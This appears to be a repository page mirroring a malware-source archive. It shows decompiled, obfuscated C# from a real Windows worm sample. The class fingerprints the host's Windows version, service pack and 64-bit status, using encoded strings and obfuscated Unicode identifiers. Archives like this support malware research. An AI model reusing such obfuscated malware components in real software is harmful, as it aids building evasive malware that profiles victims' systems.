ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/៷˴ᄨᥨᗽ.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

116 lines
5.9 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.៷˴ᄨᥨᗽ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using System;
using System.Runtime.InteropServices;
namespace Ҧ߲ʽ
{
internal class \u17F7\u02F4ᄨᥨᗽ
{
public static string \u087C()
{
OperatingSystem osVersion = Environment.OSVersion;
string str = "";
if (osVersion.Platform.ToString() == "Win32NT")
{
switch (\u17F7\u02F4ᄨᥨᗽ.\u0AE7ԵॻƂẺႦᛀળ(osVersion.Version))
{
case "4.1.2222":
str = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("L0FGPEfYO8ENT0v4ERA=", true);
break;
case "4.1.2600":
str = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("L0FGPEdP2DvBDUv4ERArHQ==", true);
break;
case "4.9.3000":
str = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("[WINME]", true);
break;
case "5.0.2195":
str = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("L0FGPEdP2DvBDUv4CggICA==", true);
break;
case "5.1.2600":
case "5.2.3790":
str = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("L0FGPEfYO8ENT0v4MCg=", true);
break;
case "6.0.6000":
case "6.0.6001":
case "6.0.6002":
case "6.0.6003":
str = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("+w0SCBMbpHuKjhfE+g0XGAU=", true);
break;
case "6.1.7600":
case "6.1.7601":
case "6.1.7602":
case "6.1.7603":
str = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("+w0SCKR7io4TGxfE2w==", true);
break;
default:
str = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("+RIPpHuKjhITGxI=", true);
break;
}
}
string empty = string.Empty;
\u17F7\u02F4ᄨᥨᗽ.\u007Eਗ਼ߎᘘᒯܡᤄ ߎܡ = new \u17F7\u02F4ᄨᥨᗽ.\u007Eਗ਼ߎᘘᒯܡᤄ();
ߎܡ.ܨ = Marshal.SizeOf(typeof (\u17F7\u02F4ᄨᥨᗽ.\u007Eਗ਼ߎᘘᒯܡᤄ));
if (\u17F7\u02F4ᄨᥨᗽ.ە\u104C(ref ߎܡ))
{
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DR", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEk=", true);
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DS", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEo=", true);
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DT", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEs=", true);
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DU", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaEw=", true);
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DV", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE0=", true);
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DW", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE4=", true);
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("8wUSFgkDBaDMBSXA8AEDC8DX", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("OGsYVzSwaE8=", true);
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("a32KjoF7fRhXNLA4aHl7gzhQ", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("iLtoXUo8uKA=", true);
if (ߎܡ.\u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E.ToString().Contains(\u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("a32KjoF7fRhXNLA4aHl7gzhR", true)))
str += \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("iLtoXUo8uKE=", true);
}
return !\u17F7\u02F4ᄨᥨᗽ.() ? str + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("iJWIaF1KPOCgng==", true) : str + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("iJWIaF1KPOCenA==", true);
}
private static string \u0AE7ԵॻƂẺႦᛀળ(Version _param0) => _param0.Major.ToString() + "." + _param0.Minor.ToString() + "." + _param0.Build.ToString();
[DllImport("kernel32.dll", EntryPoint = "GetVersionEx")]
private static extern bool ە\u104C(ref \u17F7\u02F4ᄨᥨᗽ.\u007Eਗ਼ߎᘘᒯܡᤄ _param0);
public static bool ()
{
try
{
return !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("ProgramW6432"));
}
catch
{
return false;
}
}
public struct \u007Eਗ਼ߎᘘᒯܡᤄ
{
public int ܨ;
public int \u003Fᵚᇛჩᬃഢᨨ\u00F7;
public int \u104Bᥞᶑᄧ᭐ώ\u0040;
public int ڟ;
public int Õ\u087D;
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 128)]
public string \u034Aค\u0008ᇀስ̛ׅᪧ\u1B5E;
public short ƹ\u0FC0\u0A56uᅜ;
public short \u0F72Ӱ͒;
public short \u0F30ṋᄆᆃẈҤ;
public byte \u1CED\u0EF0\u0B9BŢᵕ\u1398᩵ᗀἱ;
public byte \u1DC7ഛեᮈ\u0FD9;
}
}
}
Reference in New Issue View Git Blame Copy Permalink